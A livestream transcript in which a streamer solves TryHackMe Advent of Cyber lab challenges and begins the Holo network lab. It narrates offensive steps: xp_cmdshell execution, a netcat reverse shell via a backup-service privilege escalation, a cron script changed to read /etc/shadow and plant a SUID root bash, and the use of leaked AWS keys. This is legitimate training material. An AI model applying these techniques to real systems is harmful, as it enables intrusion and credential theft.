It would help if I unmuted myself. Okay, that's starting off nicely. All right, I switched. Yeah, nailed it. So I switched to the webcam screen, and then. All right, okay. As I was saying, welcome to the stream. Hello, Killer2224, Jay Bilson, Volcox, Subterminal, and Johnny MD5. Thank you. So actually, this is what I was about to talk about. I have implemented some sound alerts, because on occasion when I actually need to look at chat, and I'm not, it's good to have them. So, could one of you buy the sound alert? Oh, Helen, you're gonna love this. All right, someone buy the sound alert for 100 channel points, Mr. Streamer. This is my alert, and I'm hoping it's gonna actually work.
Mr. Streamer!
All right, did everyone hear that? Because I heard it, so it works my end. Good. All right, I take it from the laughs. Yeah. I hope Al appreciates it. I ripped that off a YouTube video of his. Because I had to get one without background music in it. Yeah. Exactly. I figured, he's got Hey Listen. I've got him. So... Alright, so that one's 100 points, because obviously, I don't want it to be expensive. There is also a one for 500 for when I fail, which is like fail music, but I was just testing it out. Anyway, I hope everyone is good this Friday. I also, because I figure I should probably
Mr.
start.
Streamer!
Maybe I should put the timeout down a bit. Well, it's got a timeout of 60 seconds, Killer. I can always up that. If people start spamming it, yeah. I also have Stream Raiders set up now as well. So, because I figure a lot of people like playing that on our stream, I've seen. And it's kind of a nice thing to have to sort of break up the stream, the monotony. So there we go. I have drag Captain Unit to Battlefield. I haven't actually played the other one. Yes, Strimridders. It is a weird dream. Oh, jeez.
Mr. Streamer!
Okay, I'm gonna have to put the the timeout on that down a bit. All right, hang on a minute. Let's do 5 minutes. Yeah. Okay, there we go. It's got a 5-minute timeout now. As much as I love Al, hearing his voice every minute. Okay, let's get on with the stream, otherwise we're going to be here all day. Okay, so I think I've done the Stream Raiders thing. I have put my captain on stream. I don't know if it's going to work. So we're going to start the stream off today. Yeah, Helen, you have to talk to him all the time. So we're going to start the stream today with obviously the last 7 days of Advent of Cyber 3, and then we're going to jump back into the Holo Network that we started last week. So let's get going. This was day 11, which was my day, as you can see. So yeah, I think I've started everything up. This day was just using MS SQL. So So let's actually open the terminal. Okay, we've got to check running services. mmap-pn. Copy and paste using this. And then we'll see what happens. We should get 1433, I believe the port is. Yeah, okay. Good. So there should be an open MS SQL server running. 1433, there it is. MS SQL-S. Okay. So you can use the command squish or sqsh, however you want to pronounce it, to connect, which is actually kind of nice. So we can just copy this command across. And then we are connected to the MS SQL database as the super admin or the system admin, whatever you want to call the SA. I think it's system admin technically. I hope that the Stream Raiders thing doesn't keep popping up, otherwise I'll have to turn it off. Yes, this is a really interesting tool. We'll get a prompt. You might not be able to see that prompt because it's hidden by the arrow, but it is just a 1. Yeah, we're going to do the last 7 days, including today, just to go. That's the aim of this stream. Okay. So we want to execute some queries on this server. So we're going to do select star or all from reindeer.dbo.names, if I spell names correctly, semicolon, and then you have to also type go and press enter, and then we get the table. And like I said in my video, the table, if you're in a really narrow shell like this one is, you get all this messed up stuff, so the output's not very nice, but we can answer the questions at least. 4 columns, ID, first, last, and nickname. What's the first name of the reindeer of ID 9? You can pretty much see it's Rudolph, right? The 9's right next to Rudolph. But to do it properly, we're going to go back to our query. We're going to change the star to what we actually need, which is first. So we're only going to select the first column, right? The first column being the second column, ironically. The column named first, let's say that. Where the ID equals 9. Because 9 is an integer value, you don't need quotes around it. So we can do go, and we can confirm, yes, Rudolph. If I spell Rudolph correctly. Right, yeah. Check the table schedule. Alright, let's go back to this. So we can just change reindeer.dbo.names to schedule. Go. Okay. What's the destination of the trip scheduled on December 7th? Well, it's clearly Prague. But how would we do this if we weren't just going to mind-numbingly look at the table with our eyes? We need to select the row, not the row, the column destination. And then put a where. I think it's date, is it? Date, yes. So this date is likely a date time format. So even though it's displayed like a string like this, it's not actually a string. So you can actually query it quite nicely. So you can do where date equals dec 11 2021. So we don't need, sorry, not 7. You don't need the 12 a.m. or anything like that. So that should work. Yeah, there you go. You still get Prague. I'm not sure if you can just do December 7. No. Alright, so you do need at least the year in. Alright, so Prague is the answer there. And now we check the table presence. All right, this one. What's the quantity available for the present power bank? Okay, so let's go and set this to quantity. And then we'll do the where again. Name, I think, equals. And this time, because it is a string, you do need to put it in between quotes. 25,000. Oops. Okay. Awesome. Now we're going to play around with XP command shell, which is hilarious. It's how you can execute commands, OS commands, through MS SQL, which is the dumbest thing they ever implemented. And it's pretty, I mean, if you do have permission, which, because we're the SA, the system admin, we always have permission to do this. And if we don't, we can just enable it. You just have to type XP command shell. Let's just use who am I, then go, and you get this horrible output. But that's the command. That's the output of the command. We are running as MS SQL server. Okay. Yeah. So if it is disabled, there's hang on. How to enable XP command shell. There we go. You have to do... Yeah, these two commands will enable it. So you have to basically turn advanced options on, and then you have to enable this and reconfigure both times. So technically 4 commands, but easy. Ellen, thank you for the subscription. MS SQL is only for Windows, no emulator. I don't think there is an emulator for MS SQL. I don't really see the point because you have stuff like MySQL and Postgres, and I guess Oracle as well. All right, so what's the task? There's a flag hidden in the Grinch user's home directory. What are its contents? Okay, so we can just do, for instance, a dir in the C drive to see if there's a users directory, which there probably is. Yep, there is right there. Again, the new lines are horrible, right? It's awful. Okay, so we can check users. It's the Grinch user. Okay. So we'll go. And there's no... It doesn't look like there's a file. So it's in one of these directories. So we'll check the desktop. Oops. Okay, there's nothing on the desktop. We'll check documents. Sorry about that weird noise. There we go. Okay, there's the flag. Cool. Alright, so to get the actual flag, we'll do flag.txt there. And then we'll change the dir command to type, which is effectively cat for Windows. There you go. Yeah, I'm not sure. I think it's something to do with the browser, I think. Alright, submit that. Okay, we're done. Yay, okay, moving on. I probably have to turn the machine off. Alright, sharing without caring. No, you can do PowerShell commands. Obviously I can't do it right now, but you can execute, for instance, PowerShell, and then I think you can do -C, right? And execute stuff like that. Effectively, XP_command shell executes it in like a cmd.exe kind of context. So anything you can run on the command line, you can run through this. Yeah. I think I've told, I don't know how many times I mentioned on the stream. One of my favorite vulnerabilities I ever found was a blind SQL injection, on a database, on a web application that was connected to the database as the SA user, and XP _ command shell was enabled, and I was able to exfiltrate data via PowerShell commands, which was a lot of fun. The network was egressed pretty well, so I couldn't get any connections back, but I could do DNS lookups. But I could only do DNS lookups through their DNS server, so I had to use effectively Burp Collaborator to force their DNS server to connect to my DNS server, and then exfiltrate data using a one-line PowerShell script, which was kind of fun. Yeah, code execution is pretty rare for web apps. This was a horrible web app though. Okay. GoPro Slowyo wants me to say, my how now brown cow is rather fat, don't you think? There you go. Clip it. All right. Scan the target. So we'll disconnect from. There we go. We'll clear that. So it's asking us to do nmap-pn for no ping 197.214. How many TCP ports are open? All right. Well, it's going to be between 1 and 9. Okay. 1, 2, 3, 4, 5, 6, 7. Good. Network file system NFS is a protocol that allows the ability to transfer files between different computers and is available on many systems. Yes, yes, yes. In the scan results, you should be able to. Yeah, there's the NFS. Which port is detected by nmap as NFS? 2049. I think 2049 is the standard port, and actually it must be because nmap. I didn't run nmap with version scanning, and it's already said it's NFS. So generally nmap only does that for default ports. Okay, yeah. So we can use show mount to see what we can mount. Let's copy this. All right, so we can mount /share/admin files and /confidential. It looks like. I'm not sure if my notes can be mounted actually. How many shares did we find? 4. How many shares show everyone? 3. Right, yeah. So my notes can't be mounted. Because obviously it's only mountable by nobody. Let's try with the other folder. Okay, so we're going to mount 10.10.197.214. Yeah, I thought we had to make. By the way, if this doesn't work, you can always, I think you can do -t NFS to force mount to actually do it. Let's look in temp1. Okay. 2 text files. We can open the file using a text editor such as nano. Ugh, no. Or something quicker such as less. Okay. I guess we'll use less then. 268. The title is Meditations. Seems the Grinch Enterprise has forgotten their SSH keys on our system. One of the shares contains a private key. What is the name of the share? Alright. So let's make dir temp2 and temp3. And we will mount admin files to temp2. Okay, we won't. Did I misspell it? I don't think I did. Okay. Confidential. Alright, there it is. Yep. So it was the confidential share. We can calculate the MD5 sum of a file using MD5. Yeah. MD5 sum ID RSA. Yeah, it's the tab complete sound then. Okay, that's what it is. Alright. Okay, it was a pretty simple day. I wonder what was in the admin files. I guess we'll never know. Unless we actually SSH onto the box. Should we try that? Maybe it's root. Actually, we can probably, if we cat. It might be him. So we'll do SSH-I ID underscore RSA, not the pub key. And then see if that worked. No, that didn't work. We'll try the root user. No. Yeah, so you might need to change the permissions. No, actually the permissions are fine. I think maybe they're not. Let's copy it. That sound is amazingly annoying. All right, I think we can. I think it's 600. You need to chmod it. All right. It's probably going to be his key. Yeah, it's just asking for the password. Again, this was completely out of the scope of everything. I'm just wondering why they left us with the... they left us with shares that we can't access. Nope. Okay, we will we'll move on though. I don't want to waste too much time going through a lot of this, because we have 5 days to go through, and then we have other stuff. Okay, Husky Hacks made a walkthrough for this. That's good. You should follow him for sure. Skitty has realized that she worked on a rough disaster plan. Okay. Please start the target machine. You can use the in-browser access to connect to it, or connect to it over RDP. Alright. So we'll wait for this box. Did I miss anything in chat? I did not. Good. Oh, this is going to take a while, I guess. And he's on the web app course. No. Various things happened this year that just... I don't know. I'm hoping I'll be able to do it next year. I'm trying to stream more and do some more web app content on stream. The problem with writing a course is it's just so freaking boring and slow. So it's, yeah. But yeah, I mean, I'm hoping, you know, next year at some point. But thing is, I just don't want to release a half-assed course. No, I mean, I get why people ask it. I don't mind people asking, because I know I was actively working on it at the time. I haven't really worked on it for a while now. There's just not been the motivation to do it, and like I said, other stuff is happening. So focusing on that for now. Trying to get better at streaming regularly. But yeah, and like I said, I'll do more web content on stream. I did some OAuth stuff the other day on stream and some file upload. So that's probably still available as a VOD actually. Alright. Looks like that's the Stream Raiders things come up. Not that often, so it's fine. Yeah, Portswigger Labs, yeah. Have they unblocked Portswigger finally? I know you used to not be able to say it in Twitch. It didn't like the last 5 letters for obvious reasons. But yeah. Stream videos are available, I think, for 4 weeks. And then I download them, and then I usually edit them and put them on my YouTube. It's just slow. I'm behind, so yeah. Yeah, I couldn't use it as a stream title the other day either. It's just interesting. I always remember typing it in chat as a suggestion, and it always says I can't say that word. It's like, okay. Alright, so this looks like it's a Windows Privesc. Wait, I did them? It's like, it's light editing. So, like, for instance, I start my streams 10 minutes early. So people can congregate, and so we're not starting off with absolutely nobody. Obviously, if I uploaded the raw YouTube video, that would be a very boring first 10 minutes. So I usually cut that out. I don't cut out the swear words, no, because YouTube doesn't really care about that. But I'll occasionally cut out things like accidents that happened on stream. Like, for instance, the one time I went to, I forget where it was either Google or something, and it just showed my location. Or, you know, that time on our stream where, you know, he showed porn. You probably don't want to have that. Okay, let's go down. Alright, I guess we actually have to follow. Okay, the Imperious backup service suffers from a privilege escalation vulnerability. Skiddy could use it to elevate her privileges on the system. When Imperious backup is installed as a service, it can be configured to run backup tasks with administrator privileges, even if the current user have a lower privilege level. Alright, let's create a new backup task. How do we actually do this? I guess, is it installed? There it is. Alright, so we'll run it. Okay, so let's just check if this is... This is probably not running. Go to details. No, this is still running as Skiddy. So obviously this is going to talk to some backup service. Okay, so we'll create a new backup. The task itself is not important. You can set the backup path. Did I do something wrong? No, I think I did. Okay. Add folder. There we go. Alright, so we're going to set the folder as documents, it says, right? Yep. Okay. Destination tab. Set the location as the desktop. Other processes. The other processes tab is important. As you can see, this gives us the option to set a program to run after every backup process. Okay, as the backup process is run with administrator privileges, any program on external file configured here will be run with administrator privileges. To exploit this, we can simply create a simple bat file and set it to run before the backup. Okay, launch the notepad editor. Sure we will. Alright, I'm just going to copy. I'm not going to copy this. I'm just going to type it in. Alright, C users skiddy downloads netcat.exe, and then we need to go to our attack box. Just copy that, I think. Alright. This probably won't. No, that won't work. Okay, lovely. I need to. Hang on a minute. I'm just gonna shove this across here. There we go. Alright. I'm just gonna memorize it. 10.10.179.104. Alright, there we go. Correct. Excellent. And then we can maximize this again and go back here. Alright, let's scroll down. 1337. Okay. cmd.exe. We'll just do this. We'll finish these this task, and then we'll do Stream Raiders. Alright, you can save the file. So you need to, if you are saving a file using Notepad, you need to go save as type and select all files. Did it tell us to run it? We'll just do privesc.bat on the desktop. It should work. And then we go back here. Options. No, other processes, wasn't it? Run a program. There it is. Okay. Hang on, did I do it all right? Okay, so I think that's done. Specify a name. Yep, new backup job is fine. What? Okay, there we go. So now I think we can just right click and obviously click that, but before we do that, we actually want to create a listener. If I actually select the attack box, so we'll do nc-nvlp1337. Okay, and if we run this as a service, backup will run automatically. Let's see if we get something back. I tell you what, we'll go do Streamlabs, Stream Raiders. Okay. I have no idea how to do this. I should really turn that down. Okay. Apologies for the sounds. We'll grant random rewards now. Okay. Let me change my live screen back. I don't know what we did, but we did stuff, and I should probably turn the sound down next time, so I'll try and do that. Let's try this battle. But, in the meantime, it looks like we have got a shell back, and we're running as the Grinch. Excellent. Okay. Complete the username P something. Okay, net users. Okay, right. So it wants us to run net users. Pepper, right. What do we achieve with the shell? So previously we were signed in as McSkiddy, and now we have created the shell using the Grinch user, because the Grinch user was the one that actually runs the backup service. So effectively, even though you can configure backup jobs using our regular user account, when they actually run as a service, the service runs with elevated privileges. And since we can attach batch files to the privilege, batch files to the service, the process, we can get a shell. Yeah, Prives. This is a Prives room. What's the OS version? Is it... I mean, I guess we could use system info. Unless there was another command they asked us to run. No, there is. Okay, system info. I should probably use find string, shouldn't I? But the OS version is here. Alright, so we can copy that. Paste. And then we want to run this command, which basically lists the services. Okay, there's a lot of services. There should be one that's called backup or something. Let's go. This looks... No. Okay, so we probably need to use find string. Yeah, it's not good, is it? We can't do that. What's the command again? I don't use Windows. Service list, right? If we do find string, let's try backup. What backup service did you find running on the system? I think it's just this. Yeah, this is the service name. I think this is the service description. Yeah. Okay. Yeah, that's good. What is the path of the executable for the backup service you have identified? Okay, that should be this. Okay. Run the who am I command. We did that already, but we'll do it again. What user do you have? We have this user. Okay, the flag file. Is it going to be in C users? Probably in the Grinch. Oops. Desktop, maybe? No, but they left Wimpies. Maybe documents? Yeah, okay. So we can type the flag.txt. There it is. Oh, I need to actually put my gun on the battlefield, I guess. There we go. Alright. Run the piece. Nah. Alright, we're gonna type schedule. Where can we find him at 5:30? Jazzercise. Alright, so this is from the movie, which I actually watched the other day. Cool. Alright, we're done. Moving swiftly on. Let's terminate this one. If you want to know more about that, I have a Windows Privesk room on TryHackMe. I also have a Windows Privesk course to go along with the room. Yeah, that's exploiting services, pretty much. In a roundabout way. Okay. Dev insecure ops. Okay. Alright, so we're using the CI/CD, continuous integration, continuous delivery. Alright. I do have 2 courses. I think I can do that. There you go. I'll be doing a Christmas promotion, I think. It'll probably start next week at some point. All right. So I guess we're waiting for the attack box. No, we're waiting for the CI/CD box. Thank you, Shy Hat. Appreciate the feedback. Okay, so we're going to visit this in our browser. So we'll fire up Firefox. I like it that they say we can run Derby to discover the admin page, or you could just tell us it exists, I guess. Oh, I'm not going to Google Jazzercise. All right, hang on. 10, 10, 250, 252. I wonder if there's anything in the page source. No. Okay. So yeah, effectively, there's an ad. I cannot spell today. There's an admin page, which we could have found, sure, using using, yeah. Derby, not Go Buster, Ferex Buster, any of them. Yeah. Alright, look at the source code. Alright, so it's an iframe to ls.html, which just contains the text. The page seems suspiciously close to the output from running the ls command. Kinda. Alright. Connect to the target machine using the in-browser access or via SSH. Alright, we'll use SSH. How do I get that? Cancel that. 10. Oh, hang on. Looks skitty. At 10. 10 to 50 252. Password 1. Alright, so we'll navigate to home, the Grinch scripts. Probably if I do a / instead of a dot, that would work. Okay. If we do an ls-l, these are all owned by root, apart from loot.sh. These are all owned and only readable by root, apart from loot.sh. Let's do cat loot.sh. Alright. So in this case, yeah, this is doing an ls on home, the Grinch loot, and then it's going to redirect the output into the ls.html file, which we saw here. I presume that's going to do it on some kind of cron job. There seems to be a problem regarding the permissions of this continuous integration attempts. Yeah, we can change the contents because everyone can. Change the code to in the file to print the contents of the Etsy shadow file. Okay. Is Vim going to work on this? It is. Nice. Okay. So what we'll do instead is we'll do cat Etsy shadow into the same file. Okay. This specific configuration can be leveraged to read the contents of the Grinch's other scripts. Okay, well, we should. We just refresh. Yeah, there we go. Okay, that worked. Cool. Okay. So we know that works. We know we can effectively run that as root. Are there any questions here? How many pages? Okay, yeah. How many scripts? There were 4. What are the 5 characters of Pepper's following that? I mean, okay, I guess we can look at the check.sh, but since we have access anyway, can't we just get a reverse shell? I feel like we can, but okay, let's, instead of doing that, home, the Grinch scripts check.sh. We'll try that. And we'll just keep refreshing until I guess we can answer the Derby question. We just. There we go. Oh, hang on. Did it find? Oh, so we actually have to run this freaking thing. Ah. Okay, I thought it meant how many were in its actual word list. Okay. Let's do this. 10, 10, 250, 252. Hey, Angel D. Okay. I mean, again, it's going to be between 1 and 9. Alright, let's check on the output. Alright. Secret password reminder script version 1.0. So it curls the ls.html, sets that as the variable response. This is bash, by the way. Then it's echoes the response into temp/check. And doesn't use that variable anywhere. Then it greps for remindme.txt in check. And then it outputs elves are fast to pass.html. So I'm guessing we're supposed to log in using that, I guess. We could have done a reverse shells route as well. So we can su the Grinch. And there we go. Alright, so now I guess in loot. Nope. On the desktop. Yeah. Okay, then. Okay, so we do have to get a reverse shell. Alright, that's good, that's good, that's good. I don't really understand what the point of this is. Let's just get a reverse shell. Oh, not even a reverse shell. We have access. Folks, what are we going to do now? How are we going to get privilege escalation using a script that's run as root? Yeah, Killer, I don't need a reverse shell. I completely forgot I had SSH already. A bash SUID, but what do I call it, Angel D? I don't call it a bash SUID. Root bash. That's it. We copy bin bash to temp/root bash. And then we chmod plus xs. Technically you don't really need the x, I just do it just in case. And then we'll do that. I'm imagining it runs every minute. All we can do is just do a watch every second ls-l temp. Okay. Root bash stream deck button. I do need a root bash one. Well, the problem was the flag is only readable by root. So I could privilege escalate to the Grinch user, but then I can't read the flag. Anyway, we've got our root bash. Oh, so yeah, I guess we could have pointed the script to cat the flag, I guess. Yeah. I mean, there's multiple ways of solving this box. This one just feels cleaner. It's in desktop. I just like getting a root shell. Die Hard is the best Exodus movie. It's not the best. It's definitely a good one. Alright. Sorry, I don't know why I switched. Alright, it found 4. Good. Alright. Oh yeah, I can press the I'm in button. I can. That's right. Let me do that in a minute.
I'm in.
There we go. Cool. Okay, let's move on. All right, 3 more days left. Okay, this one we don't even need to frickin' boot. It's just a site. All right. Complete the quiz. And, oh, okay. We don't even need to do this. So what is this one? Do I even do this one? Alright, chat, do you want me to do this or not? Or should we just skip to day 16? Alright, if I was stranded on a desert island, the first thing I would do... I wouldn't do that. Scope the landscape for potential threats. Gather food and plan next steps. Yeah, I'll build a shelter. In my spare time, I like to... I'm gonna say keep busy by learning something new. If I could buy a fictional celebrity dinner, it would be... Oh. That's a good one. It's going to be between Tony Stark and Sherlock Holmes, I think. I'll go with Tony Stark. My favorite game is none of those. But out of all of those, chess. I'm best described as curious, strategical, calm under pressure. Mischievous or practical? I'll say strategical. My favorite movie out of these ones. Oh, goodness. I'll go with Matrix. I'm an instant responder. This quiz is silly. Alright. I guess I'm giving up my day job. Alright, let's move on. Oh look! One of Al's... Oh, it's OSINT. Lovely. Okay, let's try some OSINT. Alright. You're the responding intelligence officer on the hunt for more information about the infamous Grinch Enterprises ransomware gang. I don't know why this exists, but okay, I'll complete it. I guess we want to translate this. Let's go to Google Translate. Okay. And let's actually copy this to, yeah, we'll put it there. Oops. Again, freaking doxed myself. Why did it copy all of that? Alright. Okay. That's twice on stream. People have found, or people have been able to see the town that is relatively nearby to me. Alright, I think this was the question. What social media platform is the username associated with? Okay, so we can just Google this username, I guess. Reddit? No. This is the problem. I bet people have created these. Yeah. Is it Twitter? I was gonna guess. Screw it. Okay, it's Twitter. What is the cryptographic identifier associated with the operator? I guess this. Not sure it's a cryptographic one. No, okay, that wasn't it. I guess we have to go to the Grinch Twitter. All right. Yeah, here we go. I'm guessing it's this. Okay. What platform is the cryptographic identifier associated with? Keybase.io. What is the Bitcoin address of the operator? I guess if we go there, there it is. Can I just copy that? What platform does the operator leak the Bitcoin address on? I guess so we just search for that address then. Or not, maybe? View all? No, that's not it. It is there? Okay. What was the... 6 letters. Oh, hang on. Maybe GitHub. Yeah, okay. So we've got this Christmas Hater 31. To get their email address, it's probably gonna be in the comment. I think you can get it in the comment. I'm not sure if it shows it. If it doesn't show it here, we can just grab it. We can do a git pull. Sorry, git clone. And then do a git log. That's not his email address then. So GitHub does a nice job of filtering that. Twitter? Okay. It was right there. Where did I miss it? Oh, okay. I mean, I don't think it is in this. On the GitHub page. Okay, all right. Oh, okay. It was in. All right. Gotcha. All right. Thank you for the clue. And operator's real name, I'm guessing, is this. All right, just in time. All right, cool. Let's. Do we have to start up anything here? No, okay. Cool. All right, so we'll do Stream Raiders, and I'll try and turn down. I'm guessing I have to turn down. Hang on, let me just try and. Alright, I'm gonna have to just turn down the generic sound, I guess. Alright, let's see if this works. Start battle. Is that a little better? Oop. Alright. We'll start that one. I figure maybe there's settings. Yeah, there's probably a setting for it. Because I don't really want to turn down all of the sound. Sounds, there we go. I'll just mute it. Alright, fixed. Now I'll put my guy on. There we go. Alright, day 17. The final one for this stream before we move on to Holo. Okay. Someone mentioned earlier this was AWS. Alright, so what are the tasks? Sorry, I'm just going to skim read. Okay. Somehow the Grinch managed to get hold of all the elves' names and email addresses. Blah, blah, blah. Here's the image sent out announcing the new site. Based on that, can you figure out how the Grinch got access? I mean, let me close all this. Right, okay. So yeah, so this is obviously an image hosted on AWS. What is the name of the S3 bucket used to host the HR website announcement? I think it's just that. Right, because we could also go to Yeah, that's how AWS works. So you have a subdomain which is unique, where everything's hosted, but you can also get to it the other way, where you just go to s3.amazonaws.com and put that in there as well. So 2 methods. What is the message left in the flag.txt object from that bucket? Okay, so presumably, if I go to this one, right. So again, if you have a misconfigured AWS S3 bucket, if you go to the root directory, it will list everything that's accessible or that's uploaded. So it's asking the message left in the flag.txt object. So we can just search for flag or not. So it is at flag.txt. So that makes it easier. Let's duplicate and go to flag.txt. There we go. What other file in that bucket looks interesting to you? The backup file, probably. So we'll download the backup. Save that. Where was it saved? Downloads. Extract it. Sure. Show the files. Or not. Alright, so this is clearly a backup of a WordPress instance. You could pretty much almost predict that from the name of the backup file as well. What is the AWS access key in that file? So I don't know if it's going to be in the WP config or not. It is, okay. What is the AWS account ID that access key works for? Okay, this is where we may have to read up. I presume I can just configure it. Do I have AWS installed? No. It might be AWS CLI. No. Let's do a search for AWS. There's AWS CLI without the dash. Alright, download that. Yeah, so if you do find credentials, you can just pretty much set them up in AWS CLI. So we will do this though. We'll do Grinch. Basically, all you have to do is it'll prompt you. So you want the access key, which we have here. The secret key, which is this thing. And the default region name, which you, if it's different, I think US, it's either US East or US West one is the default. But we'll stick that in as there. Output format, whatever. And then you can do. Doesn't matter. I think it does if you have things hosted in different regions. Don't quote me on that though. Identity. Right. So now we can do this. Oh, S3 might be across all regions, yeah. So if we do this. This is a nice check to see if we actually... I need to reference the profile. There we go. Alright, so these were valid credentials. We are, you know, there's our account ID, our user ID. Yeah. So these were correct credentials. Okay. AWS account ID, so literally this one. What's the username for the access key? Was there a username in there? Oh yeah, there we go. I don't know if it needs all of that. Looks like it might do. Yep. There is an EC2 instance in this account under the tags. What is the name of that instance? So I'm guessing we can just... This is basically a copy and paste exercise. Okay, so instances are here. What was the question? What is the name of the instance? Okay, I think it's that. No, it's not. Okay. Oh, it says tags, right? There it is. HR portal. What is the database password stored in Secrets Manager? Does this have an IP address somewhere? Yeah, okay, it does there, but that's obviously internal. Does it have an external IP address? I'm not entirely sure. I guess I'll take the hint. Okay, so it's a thing. All right. I wasn't sure if Secrets Manager was a thing or not. I guess list secrets. List dash secrets. Specify oh, I need to do Grinch. There we go. Okay. Might be this one. No. Is it just payroll? Alright, no, it's not that. Description, portal DB secret, bunch of tags. Okay, hang on. Get secret value, okay. Right, so we're listing the secrets. I've never used the secrets API before, so this is completely new to me, but it looks like the secrets are kind of like objects, and by default they do not list. So we need the secret ID. Okay. So we need to do profile, Grinch, and then secret ID. And the secret ID is... Is it just HR portal, maybe? Or HR password, maybe? Oops, oops. It's not in this region. Santa wants to have low latency to his database. Look closer to where he lives. Okay, so let's... AWS regions. All right. Yeah, the question is... There's a Canada region, which is more north, I guess. We could try Canada. Is there a region we can just... How do we... Can we just override the region? Yeah. I guess we should actually list the secrets, really. First. I guess we do region Canada. I guess I don't know what the Canada one is. Maybe in Europe. I guess. I just really want to have a nice list of regions. Here we go. Okay, so there we. That's why it was CA Central 1. So let's try Canada and see if Canada's one. Jeez, was it CA Central 1? All right, not Canada. Yeah, we could try EU North 1. There we go. Okay, it's EU North 1. Still HR password. Winter 2021. Okay. Alright. I like this. I like that one. That was good. I learned some stuff about AWS. Alright. Well, now we all know how the secrets manager works. Cool. And before I go, I'm gonna remove this one and also remove the .aws credentials. There we go. Okay. Nice. Okay, people. That is the Advent of Cyber over for another week. I think next week will be the last one. It depends on when they do one on the 25th. But I believe next Friday is the 24th, so that should be that. Let's go to Holo now. I actually had it open already. Okay, I guess I should connect to the network. To Holo Live, please. Cool. All right. Oh yeah, I can probably turn off the attack box. There we go. Alright, get rid of that. Get rid of that. So, last week, to recap for those who were not watching, we got given this IP range as the external IP range to attack. And they pretty much give you the address. I think that was the address anyway. Let me actually look in the scans. Right, external letter map. Okay, so which host was up? Alright, so we found holo.live was this IP address. I think that was the only one. No, okay, so there is 250 as well. But I believe on holo.live we did some enumeration, some subdomain searching, and we found admin.holo.live, dev.holo.live, and www.holo.live. The dev had an LFI when it was loading images, a local file inclusion, so we could grab admin.holo.live had a robots.txt which listed these internal paths. I should probably start with that one. So, because obviously you can't get to var admin super secret directory, and we did try just going to these on the web server just in case. Couldn't get to there, but on the dev site we could. So we pulled out the admin username and password, and then I think back on admin.holo.live, went to the dashboard, logged in. There was a hilarious RCE. We found some database credentials for an internal machine, and I copy and pasted the reverse shell code. But let's see where we were. Alright, now we have a shell on the box, so let's get a shell back on the box. Alright, clear this, IPA. Did our IP address change? 141.16? No, okay, good. So we can just use this again. And so I was listening on 4444, and then we just went to this. Actually, we're gonna have to log in. So go to admin.holo.live. I just remembered we needed to. We need to set up the Junus mask. Okay, so the servers have changed their IPs, I think, right? (200.144). No, they haven't. So what's going on? Why can't I get to admin? I guess, yeah, dev. I can, okay. Maybe it was just being a bit slow. Network's off? I don't think so. That's all good. Oh, thank you, yeah, reminding me that. Let me do this. TryHackMe Holo Network. Okay. Let's just see if we can... Alright. Can we actually ping this? Maybe the entire network's down. Hang on. Okay. I swear that was grayed out before. Alright, so we have to wait a little bit. That was why we couldn't connect, because the... Oh, you said you're... Right. Thank you, I don't know how to pronounce your name. Anu Brecton, your network is off. That's what you meant. Alright. I swear the start button was grayed out. Maybe it wasn't. Appreciate it. Okay. Any questions about what I explained so far, by the way? I don't know how many of you were not here last week. Let's see if it's up. Right, yeah. We haven't even got to the point where we use the C2s yet. Okay, so we have obviously the username and password that we found before. When we view the page source here, there was this stupid thing. Let me zoom in. So it was commented out PHP code that looks like it uses the pass-through, which is effectively another one like system or shell exec. So it runs operating system commands using the cmd get variable. Even though it's commented out, it actually works. So yeah, we could just do this. And there we go. We're in. All right. Hang on. There we go.
We are in.
Okay. So it's saying... Alright, so it's saying we do this. Yeah, we can... I mean, we didn't use Meterpreter, but I guess we can stabilize our shell this way, yeah. I'm guessing we need Python 3. Okay, that worked. If you're using ZSH, which we are. Okay. Reset and export that. Okay, is it bash? Did I do it wrong? Right, yeah, I didn't background it, okay. That's what I get for following the instructions. Why isn't that working? Okay. So the network gone down? No. Oh dear, what have we done? It's still up. Can we curl it? All right. While we're molding on that, let's do Stream Raiders. I need to reload. Oh, jeez. Hopefully this is gonna work. All right. Cool. Let's go Stream Raiders, and then hopefully this won't have any sound. It does have sound. Great. Oh, just that bit. Okay. There we go. That was better. Alright, now I figured out how to turn the sound effects off as well. Alright, we will continue on our quest, I guess.
We are in.
Oh. We're still in, guys. I guess the GIF didn't deload. What's the game called? Stream Raiders. You can look at the link in the Stream Captain bot. I think you can log in using Twitch. If you just click that link as well. It's a weird little game. It's kind of quaintly fun. Alright, let's try curl again. It shouldn't really still be... It shouldn't be hanging though. It shouldn't just be taking up one process. That's really bizarre. That's going to be really annoying if we can't get the box back. Is that actually like giving us anything? See, okay, it is working. It's just my browser. Let's try a private window. Yeah, okay. It was just, I don't know why Firefox does that sometimes. Is it still doing it in this side? Yeah. Who knows? Okay, we'll do a private version of Firefox. We'll do DB admin and DB manager login here. And then we'll copy and paste this thing. Make sure we have Netcat listening. It is. Go to here. Okay. Back to this. Alright, so we want to use Python. Cool. I think that worked. I can pause the terminal and modify. Right, so we need to background it. So we can background it, I think, right? No, hang on. How do you background it? Hang on. I've got the instructions in here. I don't oftenly make a full interactive shell. Control Z, that's the one, right? Okay. So now we can do these instructions. We need to run this, I guess, combined. I didn't actually know this for ZSH. Alright. Reset and export. Just to enter. Why is it doing this? Xterm, okay. Alright, cool. Export shell equals bash. We did that. Guessing this is Xterm as well. And then what we need to do is, I remember this bit, we do stty something, right? How did you get yeah, right, the size. See, this shows how often I do this. Right, and so we must use these values. So that's 35 rows, 146 columns. Yeah, so now we can do this one, stty rows, and then columns. And it's 35 columns and 146. Okay, cool. And now we should have up and down and I think some tabs. Yeah, tab complete. Nice. Okay. So stabilize our shell. We have done. All right, Docker. Now we've gained a shell onto the web server. We need to perform some situational awareness to figure out where we are. We know from looking. Hang on a minute. We know from looking through some files when we exploited LFI this may be a container. Did we? We must have skipped that bit. We can run some further enumeration and information gathering to identify whether that is true or not. Okay. So I'm not going to read over all of this. Okay, so PSAUX. Yeah, so there's a bunch of our shells, I think. There's the other one. Okay. I mean, this one didn't This one has quite a few processes running, but yeah, it doesn't have the usual processes. You would see way more stuff. For instance, like if you compare it to mine, like even though I'm running quite a lot of stuff, you have all these services running. Clearly this doesn't. So I guess that's a clue. And then, yeah, there should be a Docker M file. If we do ls dash, dash la in root, there's a Docker env file. Okay. C groups are used by containerization software such as LXC or Docker. Let's look for them by navigating to proc1 and then catting the C group file. Okay. Proc1. Like I said before when I started this last week, this is going to be a learning experience for me as well. I haven't done much Docker stuff. I've played around with Docker locally, but my day job doesn't require me to escape from containers that much. Okay. So, done that. Submit the 